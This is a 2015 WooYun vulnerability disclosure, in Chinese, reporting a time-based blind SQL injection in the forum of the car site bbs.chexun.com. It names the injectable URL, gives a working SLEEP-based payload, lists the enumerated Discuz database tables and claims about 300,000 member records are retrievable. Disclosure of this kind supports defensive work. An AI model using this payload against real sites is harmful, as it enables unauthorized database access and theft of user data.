乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-13: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开
test
车讯网bbs存在sql注入漏洞,可获取几十万论坛用户信息
注入点:http://bbs.chexun.com/api/ucuser1.php?callback=messagenum&mod=notice&r=0.02613745385060029&uid=null
Place: GETParameter: info Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: info=51 AND SLEEP(5)
通过注入可以获取到数据信息
当前库为discuz可以跑出345个表
+---------------------------------------+| bbs_home_doing_mderate || bbs_common_addon || bbs_common_admincp_cmenu || bbs_common_admincp_group || bbs_common_admincp_member || bbs_common_admincp_perm || bbs_common_admincp_session || bbs_common_admingroup || bbs_common_adminnote || bbs_common_advertisement || bbs_common_advertisement_iustom || bbs_common_banned || bbs_common_block || bbs_common_block_favorite || bbs_common_block_item || bbs_common_block_item_data || bbs_common_block_permission || bbs_common_block_pic || bbs_common_block_style || bbs_common_block_user_recommend || bbs_common_block_xml || bbs_common_cache || bbs_common_card || bbs_common_card_log || bbs_common_card_type || bbs_common_connect_guest || bbs_common_credit_log || bbs_common_credit_log_field || bbs_common_credit_rule || bbs_common_credit_rule_log || bbs_common_credit_rule_log_field || bbs_common_cron || bbs_common_devicetoken || bbs_common_district || bbs_common_diy_data || bbs_common_domain || bbs_common_failedlogin || bbs_common_friendlink || bbs_common_grouppm || bbs_common_invite || bbs_common_magic || bbs_common_magiclog || bbs_common_mailcron || bbs_common_mailqueue || bbs_common_member || bbs_common_member_archive || bbs_common_member_bction_log || bbs_common_member_connect || 。 。 。| cdb_uc_members || cdb_uc_mergemembers || cdb_uc_newpm || cdb_uc_notelist || cdb_uc_pm_indexes || cdb_uc_pm_lists || cdb_uc_pm_members || cdb_uc_pm_messages_0 || cdb_uc_pm_messages_1 || cdb_uc_pm_messages_2 || cdb_uc_pm_messages_3 || cdb_uc_pm_messages_4 || cdb_uc_pm_messages_5 || cdb_uc_pm_messages_6 || cdb_uc_pm_messages_7 || cdb_uc_pm_messages_8 || cdb_uc_pm_messages_9 || cdb_uc_pms || cdb_uc_protectedmembers || cdb_uc_settings || cdb_uc_sqlcache || cdb_uc_tags || cdb_uc_vars || cx_pinche || cx_pinchebx || cx_weather || cxdata_login || cxdata_register || cxdata_upload_log |+---------------------------------------+
跑了一下bbs_common_member表内有30万数据,基于时间的注入,跑的太慢了,就跑两条验证一下吧
做好过滤
危害等级:无影响厂商忽略
忽略时间:2015-08-18 11:04
漏洞Rank:4 (WooYun评价)
暂无